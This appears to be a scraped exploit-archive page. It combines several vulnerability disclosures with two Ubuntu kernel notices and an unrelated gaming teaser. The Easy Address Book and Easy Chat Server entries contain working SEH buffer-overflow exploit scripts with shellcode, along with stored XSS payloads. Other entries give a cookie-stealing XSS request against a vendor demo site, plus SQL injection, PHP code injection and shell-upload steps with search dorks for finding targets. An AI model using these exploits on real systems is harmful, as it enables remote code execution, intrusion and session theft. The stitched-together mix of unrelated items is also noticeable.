Easy Address Book Web Server version 1.6 suffers from buffer overflow and cross site scripting vulnerabilities.

# Exploit Title: Easy Address Book Web Server v1.6 - MultipleVulnerabilities# Discovery by: Rafael Pedrero# Discovery Date: 2021-01-10# CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html# Software Link : http://www.efssoft.com/eabws.exe (md5sum:69f77623bb32589fb5343f598b61bbd9)# Tested Version: 1.6# Tested on:  Windows 7, 10# CVE-2023-4491: Vulnerability Type: searchbook Remote Buffer OverflowCVSS v3: 9.8CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCWE: CWE-119Vulnerability description: There is a remote stack-based buffer overflow(SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6.By sending an overly long username string to /searchbook.ghp for asking thename via POST, an attacker may be able to execute arbitrary code.Proof of concept:import socketimport structdef sendbuff():    # > arwin.exe kernel32.dll WinExec    # WinExec is located at 0x776f2c91 in kernel32.dll    shellcode_WinExec = ("\x33\xc0"                          # XOR EAX,EAX"\x50"                              # PUSH EAX      => padding for lpCmdLine"\x68\x2E\x65\x78\x65"              # PUSH ".exe""\x68\x63\x61\x6C\x63"              # PUSH "calc""\x8B\xC4"                          # MOV EAX,ESP"\x6A\x01"                          # PUSH 1"\x50"                              # PUSH EAX"\xBB\x91\x2c\x6f\x77"              # MOV EBX,kernel32.WinExec"\xFF\xD3")                         # CALL EBX    shellcode_system = (        "\x31\xC9"                # xor ecx,ecx        "\x51"                    # push ecx        "\x68\x63\x61\x6C\x63"    # push 0x636c6163        "\x54"                    # push dword ptr esp        "\xB8\x6f\xb1\xdc\x75"    # mov eax,msvcrt.system        "\xFF\xD0")               # call eax    shellcode = shellcode_WinExec    # SEH    junk1 = "A"*455    buffer =  junk1    buffer += "\xeb\x10\x90\x90"            # jmp 0x10 to nops to shellcode    buffer +=  struct.pack('<L',0x1001071e) # pop/pop/ret @ 0x1001071eSSLEAY32.DLL from !Mona 0x1001071e    buffer += "\x90" * 20    buffer += shellcode    junk2 =  "D"*(840 - 455 - len(shellcode) - 4 - 4 - 20)    buffer += junk2    return bufferdef REQ_POST (padding):    POST = (    "POST http://"+str(ip)+"/searchbook.ghp?id=1 HTTP/1.1\r\n"    "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0\r\n"    "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"    "Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\n"    "Content-Type: application/x-www-form-urlencoded\r\n"    "Content-Length: " + str(108 + len(padding))+ "\r\n"    "Connection: keep-alive\r\n"    "Referer: http://"+str(ip)+"/searchcontact.ghp?id=1\r\n"    "Cookie: SESSIONID=3938; UserID=; PassWD=\r\n"    "Upgrade-Insecure-Requests: 1\r\n"    "Host: "+str(ip)+"\r\n\r\n"    "addrbookid=1&contactid=%3C%21--cid--%3E&cancelflag=0&name=" + padding+"&cancelflag=0&name=AAA&Email=&address=&phone=&other=&search=Start+Search\r\n\r\n"    )    return POSTip = '192.168.X.X'port = 80payload = sendbuff()try:    print "\n[*] Sending POST (searchbook.ghp) exploit to Easy Address BookWeb Server V1.6, length " + str(len(payload))    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect((ip, port))    s.send(REQ_POST(payload))    s.recv(1024)    s.close()    print "\n[*] Sended POST length " + str(len(payload))except:    print "Connecting error"# CVE-2023-4492: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Address Book Web Server v1.6, does notsufficiently encode user-controlled inputs, resulting in a storedCross-Site Scripting (XSS) vulnerability via the /addrbook.ghp (POSTmethod), in multiple parameters.Proof of concept:POST http://localhost/addrbook.ghp?id=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 475Origin: http://localhostConnection: keep-aliveReferer: http://localhost/editcontact.ghp?id=1&cid=12Cookie: SESSIONID=15337; UserID=; PassWD=Upgrade-Insecure-Requests: 1Host: localhostaddrbookid=1&contactid=14&cancelflag=0&firstname=%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E&middlename=demo1&lastname=demo1&nickname=demo1&Email=demo1%40demo1.com&company=demo1&jobtitle=demo1&department=demo1&office=demo1&workphone=&workfax=&workaddress=demo1&workcity=&workstate=&workzip=&workcountry=USA&homephone=&homefax=&homeaddress=demo1&homecity=&homestate=&homezip=&homecountry=USA&mobilephone=&pager=&email2=&email3=&homepage=&notes=demo1&save=SaveVulnerable parameters: firstname, homephone, lastname, middlename,workaddress, workcity, workcountry, workphone, workstate, workzipResponse: <TR>              <TD class=row2><SPAN class=genmed><A target=_blankclass=genmed href="viewcontact.ghp?id=1&cid=12">demo1</a><script>alert(1);</script><a> demo1</A></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed><a href="mailto:demo1@demo1.com">demo1@demo1.com</a></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed>demo1, , , ,USA</SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed><ahref="editcontact.ghp?id=1&cid=12">Edit</a></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed><ahref="javascript:deletecontact('deletecontact.ghp?id=1&cid=12','demo1</a><script>alert(1);</script><a> demo1')">Delete</a></SPAN></TD># CVE-2023-4493: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Address Book Web Server v1.6, does notsufficiently encode user-controlled inputs, resulting in a storedCross-Site Scripting (XSS) vulnerability via the /users_admin.ghp (POSTmethod, authenticated Admin user), in multiple parameters.Proof of concept:Example 1:POST http://localhost/users_admin.ghp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 134Origin: http://localhostConnection: keep-aliveReferer: http://localhost/users_admin.ghpCookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>Upgrade-Insecure-Requests: 1Host: localhostuserid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=UpdateVulnerable parameter: emailResponse:<form method="POST" action=""><TR><input type="hidden" name="userid" value="2"><TD class=row2 align=left><input type="text" name="username" size="15"value="test"> </TD><TD class=row2 align=left><input type="text" name="password" size="15"value=""> </TD><TD class=row2 align=left><input type="text" name="email" size="35"value=""><script>alert(1);</script>"> </TD><TD class=row2 align=left><select name="level"><option>guest</option><option selected>user</option><option >poweruser</option></select></TD><TD class=row2 align=left><select name="state"><optionselected>Enable</option><option >Disable</option></select></TD><TD class=row2 align=left><input type="submit" value="Update"name="update_user"></TD><TD class=row2><SPAN class=genmed><A class=genmedhref="user_delete_admin.ghp?2">Delete</A></SPAN></TD></TR></form>Example 2:POST http://localhost/users_admin.ghp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 144Origin: http://localhostConnection: keep-aliveReferer: http://localhost/users_admin.ghpCookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>Upgrade-Insecure-Requests: 1Host: localhostuserid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt%40fsdfs.com&level=user&state=Enable&update_user=UpdateVulnerable parameter: usernameResponse:<form method="POST" action=""><TR><input type="hidden" name="userid" value="2"><TD class=row2 align=left><input type="text" name="username" size="15"value=""><script>alert(1);</script>"> </TD><TD class=row2 align=left><input type="text" name="password" size="15"value=""> </TD><TD class=row2 align=left><input type="text" name="email" size="35" value="tt@fsdfs.com"> </TD><TD class=row2 align=left><select name="level"><option>guest</option><option selected>user</option><option >poweruser</option></select></TD><TD class=row2 align=left><select name="state"><optionselected>Enable</option><option >Disable</option></select></TD><TD class=row2 align=left><input type="submit" value="Update"name="update_user"></TD><TD class=row2><SPAN class=genmed><A class=genmedhref="user_delete_admin.ghp?2">Delete</A></SPAN></TD></TR></form>-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities# Discovery by: Rafael Pedrero# Discovery Date: 2021-01-09# CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497# Vendor Homepage: http://www.echatserver.com/# Software Link : http://echatserver.com/ecssetup.exe (md5sum:c682138ebbea9af7948a3f142bbd054b)# Tested Version: 3.1# Tested on:  Windows 7, 10# CVE-2023-4494: Vulnerability Type: register Remote Buffer OverflowCVSS v3: 9.8CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCWE: CWE-119Vulnerability description: There is a remote stack-based buffer overflow(SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1.By sending an overly long username string to register.ghp for asking theusername via GET, an attacker may be able to execute arbitrary code.Proof of concept:import socketdef sendbuff():    # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/    # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin    # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)    shellcode = (    "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +    "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +    "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +    "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +    "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +    "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +    "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +    "\x1c\x39\xbd"    )    # SEH    junk1 = "A"*473    buffer =  junk1    buffer += "\xeb\x06\x90\x90"           # short jmp to shellcode    buffer += "\x1e\x0e\x01\x10"           # pop/pop/ret @ 0x10010E1ESSLEAY32.DLL from !Mona    buffer += shellcode    junk2 =  "D"*(600 - 473 - len(shellcode) - 4 - 4)    buffer += junk2    return bufferdef REQ_GET (padding):    GET = (    "GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n"    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n"    "Host: "+str(ip)+":80\r\n"    "Accept-Language: es-es\r\n"    "Accept-Encoding: gzip, deflate\r\n"    "Referer: http://"+str(ip)+"\r\n"    "Connection: Keep-Alive\r\n\r\n"    )    return GETip = '192.168.X.X' # change the ip addressport = 80payload = sendbuff()try:    print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server3.1, length " + str(len(payload))    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect((ip, port))    s.send(REQ_GET(payload))    s.recv(1024)    s.close()    print "\n[*] Sended GET length " + str(len(payload))except:    print "Connection error"# CVE-2023-4495: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Chat Server v3.1, does not sufficientlyencode user-controlled inputs, resulting in a stored Cross-Site Scripting(XSS) vulnerability via the /registresult.htm (POST method), in Resumeparameter. The XSS is loaded from /register.ghp.Proof of concept:POST http://localhost/registresult.htm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 257Origin: http://localhostConnection: keep-aliveReferer: http://localhost/register.ghp?username=<redacted>&password=<redacted>Upgrade-Insecure-Requests: 1Host: localhostUserName=<redacted>&Password=<redacted>&Password1=demo1&Sex=0&Email=demo1%25252540demo1.com&Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=ChangeResponse<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has beenchanged successfully.</center></body>Go to:http://localhost/register.ghp?username=<redacted>&password=<redacted>Response - xss:<TR><TD>Your profile/interests:<BR><TEXTAREA rows="4" cols="30"name="Resume"></TEXTAREA><script>alert(1)</script><TEXTAREA></TEXTAREA><INPUT type="hidden" name="cw" value="0"><INPUT type="hidden" name="RoomID" value=""><INPUT type="hidden" name="RepUserName" value=""></TD></TR># CVE-2023-4496: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Chat Server v3.1, does not sufficientlyencode user-controlled inputs, resulting in a stored Cross-Site Scripting(XSS) vulnerability via the /body2.ghp (POST method), in mtowho parameter.Proof of concept:POST http://localhost/body2.ghp?username=<redacted>&password=<redacted>&room=4HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 248Origin: http://localhostConnection: keep-aliveReferer: http://localhost/chatsubmit.ghp?username=<redacted>&password=<redacted>&room=4Upgrade-Insecure-Requests: 1Host: localhoststaticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message=demo+&chat_flag=Response:<html><head></head><body><script language="JavaScript"></script></body></html># CVE-2023-4497: Vulnerability Type: stored Cross-Site Scripting (XSS) - #3CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Chat Server v3.1, does not sufficientlyencode user-controlled inputs, resulting in a stored Cross-Site Scripting(XSS) vulnerability via the /registresult.htm (POST method), in Iconparameter. The XSS is loaded from /users.ghp.Proof of concept:POST /registresult.htm HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 235Origin: http://localhostConnection: closeReferer: http://localhost/register.ghp?username=<redacted>&password=<redacted>Upgrade-Insecure-Requests: 1UserName=<redacted>&Password=<redacted>&Password1=<redacted>&Sex=0&Email=<redacted>%252525252540<redacted>.com&Icon="><script>alert(111)</script><img%20src="1.gif&Resume=AAA&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=ChangeResponse:<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has beenchanged successfully.</center></body>When user information page load:http://localhost/users.ghp?username=<redacted>&password=<redacted>&room=4&nbsp;<font color="red">[vip room]</font><br><br>[Online users:1]<br><br>[<ahref="javascript:parent.chatsubmit.getname('All');"target="chatsubmit">All</a>]<br><br><script>if(navigator.appName!="Netscape" && parent.chatsubmit.document &&parent.chatsubmit.document.readyState == "complete")parent.chatsubmit.listcolorchange();</script><img src="/images/""><script>alert(111)</script><i>[<ahref="javascript:parent.chatsubmit.getname('<redacted>');"target="chatsubmit"><redacted></a>]<==<br><br><br><br>[<a href="javascript:OnRegister();">Change infomation</a>]</i>

Easy Address Book Web Server 1.6 Buffer Overflow / Cross Site Scripting

Ubuntu Security Notice 6324-1 - Daniel Moghimi discovered that some Intel Processors did not properly clear microarchitectural state after speculative execution of various instructions. A local unprivileged user could use this to obtain to sensitive information. Tavis Ormandy discovered that some AMD processors did not properly handle speculative execution of certain vector register instructions. A local attacker could use this to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6324-1  
August 31, 2023

linux-gkeop vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems

Details:

Daniel Moghimi discovered that some Intel(R) Processors did not properly  
clear microarchitectural state after speculative execution of various  
instructions. A local unprivileged user could use this to obtain to  
sensitive information. (CVE-2022-40982)

Tavis Ormandy discovered that some AMD processors did not properly handle  
speculative execution of certain vector register instructions. A local  
attacker could use this to expose sensitive information. (CVE-2023-20593)

It was discovered that the universal 32bit network packet classifier  
implementation in the Linux kernel did not properly perform reference  
counting in some situations, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2023-3609)

It was discovered that the Quick Fair Queueing network scheduler  
implementation in the Linux kernel contained an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3611)

It was discovered that the network packet classifier with  
netfilter/firewall marks implementation in the Linux kernel did not  
properly handle reference counting, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3776)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1075-gkeop    5.4.0-1075.79  
   linux-image-gkeop               5.4.0.1075.73  
   linux-image-gkeop-5.4           5.4.0.1075.73

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6324-1  
   CVE-2022-40982, CVE-2023-20593, CVE-2023-3609, CVE-2023-3611,  
   CVE-2023-3776

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1075.79

Ubuntu Security Notice USN-6324-1

Ubuntu Security Notice 6321-1 - Daniel Moghimi discovered that some Intel Processors did not properly clear microarchitectural state after speculative execution of various instructions. A local unprivileged user could use this to obtain to sensitive information. Tavis Ormandy discovered that some AMD processors did not properly handle speculative execution of certain vector register instructions. A local attacker could use this to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6321-1  
August 30, 2023

linux-gcp, linux-starfive vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-starfive: Linux kernel for StarFive processors

Details:

Daniel Moghimi discovered that some Intel(R) Processors did not properly  
clear microarchitectural state after speculative execution of various  
instructions. A local unprivileged user could use this to obtain to  
sensitive information. (CVE-2022-40982)

Tavis Ormandy discovered that some AMD processors did not properly handle  
speculative execution of certain vector register instructions. A local  
attacker could use this to expose sensitive information. (CVE-2023-20593)

It was discovered that the universal 32bit network packet classifier  
implementation in the Linux kernel did not properly perform reference  
counting in some situations, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2023-3609)

It was discovered that the netfilter subsystem in the Linux kernel did not  
properly handle certain error conditions, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3610)

It was discovered that the Quick Fair Queueing network scheduler  
implementation in the Linux kernel contained an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3611)

It was discovered that the network packet classifier with  
netfilter/firewall marks implementation in the Linux kernel did not  
properly handle reference counting, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3776)

Kevin Rich discovered that the netfilter subsystem in the Linux kernel did  
not properly handle table rules flush in certain circumstances. A local  
attacker could possibly use this to cause a denial of service (system  
crash) or execute arbitrary code. (CVE-2023-3777)

Kevin Rich discovered that the netfilter subsystem in the Linux kernel did  
not properly handle rule additions to bound chains in certain  
circumstances. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2023-3995)

It was discovered that the netfilter subsystem in the Linux kernel did not  
properly handle PIPAPO element removal, leading to a use-after-free  
vulnerability. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2023-4004)

Kevin Rich discovered that the netfilter subsystem in the Linux kernel did  
not properly handle bound chain deactivation in certain circumstances. A  
local attacker could possibly use this to cause a denial of service (system  
crash) or execute arbitrary code. (CVE-2023-4015)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   linux-image-6.2.0-1003-starfive  6.2.0-1003.3  
   linux-image-6.2.0-1012-gcp      6.2.0-1012.12  
   linux-image-gcp                 6.2.0.1012.12  
   linux-image-starfive            6.2.0.1003.6

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6321-1  
   CVE-2022-40982, CVE-2023-20593, CVE-2023-3609, CVE-2023-3610,  
   CVE-2023-3611, CVE-2023-3776, CVE-2023-3777, CVE-2023-3995,  
   CVE-2023-4004, CVE-2023-4015

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gcp/6.2.0-1012.12  
   https://launchpad.net/ubuntu/+source/linux-starfive/6.2.0-1003.3

Ubuntu Security Notice USN-6321-1

PHP JABBERS PHP Review Script version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: PHPJABBERS-PHP Review Script-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 08/31/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/php-review-script/## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `action` request parameter is copied into the HTMLdocument as plain text between tags. The payload aelll<img src=aonerror=alert(1)>nx0ib was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal a PHPSESSID cookie!STATUS: HIGH Vulnerability[+]Exploit:```GETGET /1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionPostaelll%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3enx0ibHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.221094441.1693486538;_gid=GA1.2.1044601458.1693486538; _gat=1;_fbp=fb.1.1693486538348.177361623;_ga_NME5VTTGTT=GS1.2.1693486538.1.1.1693486541.57.0.0Upgrade-Insecure-Requests: 1Referer: http://demo.phpjabbers.com/1693484209_401/hipark-residence.php?controller=pjLoad&action=pjActionIndex&pjPage=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Review-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/phpjabbers-php-review-script-10-xss.html)## Time spend:01:05:00

PHP JABBERS PHP Review Script 1.0 Cross Site Scripting

Innovins CMS version 4.7 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Innovins CMS v4.7 Sql Injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.innovins.com/                                                                                          || # Dork      : intext:Developed by - Innovins                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : events2.php?id= [+] http://www.127.0.0.1saingoorg/events2.php?id= <===== inject herGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Innovins CMS 4.7 SQL Injection

Islam CMS version 1.0 suffers from a remote PHP code injection vulnerability.

    ====================================================================================================================================| # Title     : islam cms v1.0 PHP code injection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://almohtaref.net/                                                                                            || # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This vulnerability affects /islamcms/index.php [+] In the search box use payload :     http://127.0.0.1/islamcms/index.php?name=search    ${@system(dir)}    ${@print inoushka}    word=%24%7b%40print indoushka}%7dGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Islam CMS 1.0 Code Injection

Invasor Diagonal CMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Invasor Diagonal CMS 1.0 XSS Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://invasordiagonal.com                                                                                        |  | # Dork      : intext:''web development // invasor diagonal''                                                                     |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /eventos.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+]  http://target_site/eventos.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Invasor Diagonal CMS 1.0 Cross Site Scripting

InterPhoto version 2.3.0 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : InterPhoto 2.3.0 Persians Remote Shell Upload vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.dl.persianscript.ir/script/InterPhoto_2.3.0_Persians(PersianScript.ir).zip                              || # Dork      : InterPhoto 2.3.0                                    '                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Register an Account : http://site/register.php  [+] Upload the shell.php instead of your photo (shell.php.jpg) : http://site/mydesk.upload.php[+] so rename shell.php.jpg to shell.php by Live HTTP Headers.(Mozilla FireFox Add-ons)  [+] Locate the shell in this route : http://site/MyWebsiteImages/XX/original/YY.php  [+] XX=Name of This Folder Like This Pattern : Year_Month_RandomChar(Sample : 2012_10_oZUGCD7IP81I)  [+] YY=Name of Shell.(Renamed to Random Char)Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

InterPhoto 2.3.0 Shell Upload

By Owais Sultan
FPS games on Android have become trendy thanks to the strong smartphone CPU power and graphics from game developers.
This is a post from HackRead.com Read the original post: The Best FPS Games on Android In 2023: Popular by Demand

